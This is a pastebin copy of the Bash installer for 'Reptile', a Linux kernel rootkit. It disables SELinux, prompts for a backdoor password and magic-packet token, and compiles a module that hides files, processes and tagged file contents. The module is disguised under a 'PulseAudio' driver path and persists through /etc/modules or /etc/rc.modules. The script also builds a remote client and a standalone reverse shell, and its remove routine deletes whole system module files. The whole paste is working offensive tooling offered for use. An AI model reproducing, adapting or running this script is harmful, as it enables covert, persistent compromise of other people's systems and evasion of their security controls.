Untitled
raw download clone
TEXT
views 35
,
size 10763 b
#!/bin/bash
#
# Reptile Install Script
# Author: F0rb1dd3n

DRIVER="PulseAudio"
KERNEL_VERSION=$(uname -r)
PWD="/tmp/tmp/Reptile-master/"

function banner {
	echo -e "\n\e[00;31m############################################################################\e[00m"
	echo -e "\e[00;31m############################ \e[01;36mREPTILE INSTALLER\e[00;31m #############################\e[00m"
	echo -e "\e[00;31m############################################################################\e[00m"
	echo -e "\e[00;36mwritten by: F0rb1dd3n\e[00m\n"
}

function usage {
	banner
	echo -e "Usage: $0 <arg>\n"
	echo -e "\tinstall\t\tCompile and install the module persistently"
	echo -e "\tremove\t\tRemove the persistence of module"
	echo -e "\tclient\t\tConfigure and compile remote client"
	echo -e "\treverse\t\tBuild a standalone version of reptile shell\n"
}

function directory_remove {
	read -p "Would you like to remove this directory ($PWD) on exit? (Y/N) [default: N]: "
	if [ "$REPLY" == "Y" ] || [ "$REPLY" == "y" ]; then
        echo -n "Removing $PWD... "
        rm -rf $PWD && echo -e "\e[01;36mDONE!\e[00m" || echo -e "\e[01;31mERROR!\e[00m"
	elif [ "$REPLY" == "N" ] || [ "$REPLY" == "n" ] || [ -z $REPLY ]; then
        echo -e "Not removing $PWD"
	else
        echo -e "Invalid option. Not removing $PWD"
	fi
}

function reptile_init {
	banner

	[ $(uname) != "Linux" ] && {
		echo "Not on a Linux system. Exiting..."
		exit
	}

	[ $(id -u) != 0 ] && {
		echo "Not root. Exiting..."
		exit
	}

	if [ -f /etc/selinux/config ]; then
        	echo -ne "SELinux config found on system!\nChecking SELinux status... "
        	if [[ $(cat /etc/selinux/config | grep "SELINUX=" | tail -n 1) == *"enforcing"* ]]; then
                	echo -ne "\e[01;31menforcing\e[00m\n"
                	echo -n "Trying to set enforce permissive... "
                	setenforce 0
                	if [ "$(getenforce)" == "Permissive" ]; then
                    	echo -e "\e[01;36mDONE!\e[00m"
                	else
                    	echo -e "\e[01;31mERROR!\e[00m"
                	fi
                	echo -n "Trying to disable SELinux... "
                	sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || {
                        echo -e "\e[01;31mERROR!\e[00m\n"
                        #exit
                	}
                	echo -e "\e[01;36mDONE!\e[00m"
                	echo -e "\e[01;33mMaybe you will need to reboot!\e[00m\n"
        	else
                	echo -e "\e[01;36mclear\e[00m\n"
        	fi
	fi      

	[ ! -e /proc ] && {
        echo -e "We're in a horrible jail as /proc doesn't exist. Exiting...\n"
        exit
	}

    for f in $(find /etc -type f -maxdepth 1 \( ! -wholename /etc/os-release ! -wholename /etc/lsb-release -wholename /etc/\*release -o -wholename /etc/\*version \) 2> /dev/null)
    do 
    	SYSTEM=${f:5:${#f}-13}
    done

    SYSTEM="redhat"
    if [ "$SYSTEM" == "" ]; then
    	exit
    fi

	#perl -MCPAN -e "install String::Unescape"# > /dev/null 2>&1
}

function config_gen {
	echo "Hide name (will be used to hide dirs/files)"
    read var
	MODULE=$var
	DRIVER_DIRECTORY="/lib/modules/$KERNEL_VERSION/kernel/drivers/$DRIVER/$MODULE"

	echo "Auth token to magic packets"
    read var
	TOKEN=$var

	echo "Backdoor password"
    read var
	PASS=$var

	echo "Tag name that hide file contents"
    read var
	TAG=$var

	echo "Source port of magic packets"
    read var
	SRCPORT=$var

	RSH="n"

	echo -e "\nToken: \e[01;36m$TOKEN\e[00m"
	echo -e "Backdoor password: \e[01;36m$PASS\e[00m"
	echo -e "SRC port: \e[01;36m$SRCPORT\e[00m"

	if [ "$RSH" == "y" ] || [ "$RSH" == "Y" ]; then
		echo -e "\nReverse shell each X time:"
		echo -e "Reverse IP: \e[01;36m$LHOST\e[00m"
		echo -e "Reverse Port: \e[01;36m$LPORT\e[00m"
		echo -e "Interval: \e[01;36m$INTERVAL\e[00m"
	fi

	echo -e "\nTAGs to hide file contents: \n\n\e[01;36m#<$TAG>\n\e[00mcontent to be hidden\n\e[01;36m#</$TAG>\e[00m\n"

	echo -ne "Configuring... "
	
	if [ ! -d $DRIVER_DIRECTORY ]; then
        mkdir -p $DRIVER_DIRECTORY
    fi

	_SHELL="/"$MODULE"/"$MODULE"_reverse"
	CMD="/"$MODULE"/"$MODULE"_cmd"
	
	cat > scripts/start <<EOF
#!/bin/bash
#<$TAG>
EOF

	if [ "$RSH" == "y" ] || [ "$RSH" == "Y" ]; then
		cat >> scripts/start <<EOF	
$_SHELL -t $LHOST -p $LPORT -s $PASS -r $INTERVAL
EOF
	fi

	cat >> scripts/start <<EOF
$CMD hide \`ps -ef | grep "ata/0" | grep -v grep | awk '{print \$2}'\`
$CMD file-tampering
#</$TAG>
EOF
	chmod +x scripts/start
	
	START="/"$MODULE"/"$MODULE"_start"
	TAGIN="#<$TAG>"
	TAGOUT="#</$TAG>"
	AUTH=0x3b7567cb
	HTUA=0x87236fc7

	cat > config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define TOKEN 		"$TOKEN"
#define PASS 		"$PASS"
#define SHELL 		"$_SHELL"
#define START 		"$START"
#define HIDE 		"$MODULE"
#define HIDETAGIN 	"$TAGIN"
#define HIDETAGOUT 	"$TAGOUT"
#define PATH        "PATH=/sbin:/bin:/usr/sbin:/usr/bin"
#define WORKQUEUE	"ata/0"
#define SRCPORT 	$SRCPORT
#define AUTH		$AUTH
#define HTUA		$HTUA

#endif
EOF

	cat config.script | perl scripts/destringify.pl > config.h
	#cat config.script > config.h
	rm -rf config.script

	HOMEDIR="/root"
	RCFILE="/"$MODULE"/"$MODULE"_rc"

	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define HOMEDIR		"$HOMEDIR"
#define RCFILE 		"$RCFILE"
#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"
#define AUTH		$AUTH
#define HTUA		$HTUA

#endif
EOF

	cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	#cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script

	echo -e "\e[01;36mDONE!\e[00m"
}

function reptile_install {
	reptile_init
	config_gen

	echo -ne "Compiling... "
	make all > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	mv bin/reptile bin/$MODULE.ko > /dev/null 2>&1 && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	echo -ne "Copying files to \e[01;32m/$MODULE\e[00m... "
	mkdir -p /$MODULE 2> /dev/null && \
	cp bin/$MODULE* /$MODULE 2> /dev/null && \
	cp bin/reverse /$MODULE/$MODULE"_reverse" 2> /dev/null && \
	cp bin/cmd /$MODULE/$MODULE"_cmd" 2> /dev/null && \
	cp scripts/start /$MODULE/$MODULE"_start" 2> /dev/null && \
	cp scripts/bashrc /$MODULE/$MODULE"_rc" 2> /dev/null && \
	chmod 777 /$MODULE/* && \
	rm -rf bin 2> /dev/null && \
	rm -f scripts/start 2> /dev/null && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	echo -ne "Installing... "

	cp "/$MODULE/$MODULE.ko" "$DRIVER_DIRECTORY" 2> /dev/null || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

    if [ "$SYSTEM" == "debian" ] || [ "$SYSTEM" == "ubuntu" ]; then
    	echo -ne "#<$TAG>\n$MODULE\n#</$TAG>" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
    elif [ "$SYSTEM" == "redhat" ] || [ "$SYSTEM" == "centos" ] || [ "$SYSTEM" == "fedora" ]; then
    	echo -ne "#<$TAG>\nmodprobe $MODULE\n#</$TAG>" >> /etc/rc.modules && \
		chmod +x /etc/rc.modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	#elif [ "$SYSTEM" == "arch" ]; then
    #	echo -ne "#<$TAG>\n$MODULE\n#</$TAG>" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
    fi

	gcc loader.c -o loader
	depmod && \
	#insmod /$MODULE/$MODULE.ko > /dev/null 2>&1 
	./loader /$MODULE/$MODULE.ko && \
	echo -e "\e[01;36mDONE!\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	rm -f loader

	directory_remove
	echo -e "\nInstalation has finished!\n"
}

function reptile_remove {
	banner

	echo "Hide name"
    read var
	MODULE=$var
	DRIVER_DIRECTORY="/lib/modules/$KERNEL_VERSION/kernel/drivers/$DRIVER/$MODULE"
	
	if [ ! -d "/$MODULE" ]; then
	    echo -e "Reptile seems to be uninstalled!\n"	
	    exit
	fi

	echo -e "\n\e[01;31mPussy!\e[00m"
	echo -ne "Uninstalling... "

	rm -rf /etc/rc.modules
	rm -rf /etc/modules
	depmod

	if [ -z $(lsmod | grep reptile | cut -d " " -f 1) ]; then
		/$MODULE/$MODULE"_cmd" show > /dev/null 2>&1 || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	fi

	rm -rf /$MODULE && \
	rm -rf $DRIVER_DIRECTORY && \
	echo -e "\e[01;36mDONE!\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	directory_remove
	echo

	read -p "To complete this uninstallation is needed to reboot (Y/N) [default: N]: "
	if [ "$REPLY" == "Y" ] || [ "$REPLY" == "y" ]; then
        echo -e "Rebooting... "
        reboot
	elif [ "$REPLY" == "N" ] || [ "$REPLY" == "n" ] || [ -z $REPLY ]; then
        echo -e "Not rebooting the system!"
	else
        echo -e "Invalid option. Not rebooting the system!"
	fi
	echo
}

function client_build {
	banner

	echo -ne "\nConfiguring... "

	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"

#endif
EOF

	#cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script
	echo -e "\e[01;36mDONE!\e[00m"

	echo -ne "Compiling... "
	mkdir -p bin && \
	cd sbin && \
	make listener > /dev/null 2>&1 && \
	make packet > /dev/null 2>&1 && \
	make client > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	cd .. && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	echo -e "\nYour client is at \e[01;32mbin/\e[00m\n"
}

function reverse_build {
	banner

	echo -ne "\nConfiguring... "

	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define HOMEDIR		"/root"
#define RCFILE 		"/var/tmp/.bashrc"
#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"

#endif
EOF

	cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	#cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script
	echo -e "\e[01;36mDONE!\e[00m"

	echo -ne "Compiling... "
	mkdir -p bin && \
	cd sbin && \
	make standalone_reverse > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	cd .. && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	echo -e "\nYour reverse shell is at \e[01;32mbin/\e[00m\n"
}

case $1 in
    install)
    	reptile_install
    	;;
    remove)
    	reptile_remove
    	;;
	client)
		client_build
		;;
	reverse)
		reverse_build
		;;
	"")
		usage
		;;
esac
close fullscreen
Login or Register to edit or fork this paste. It's free.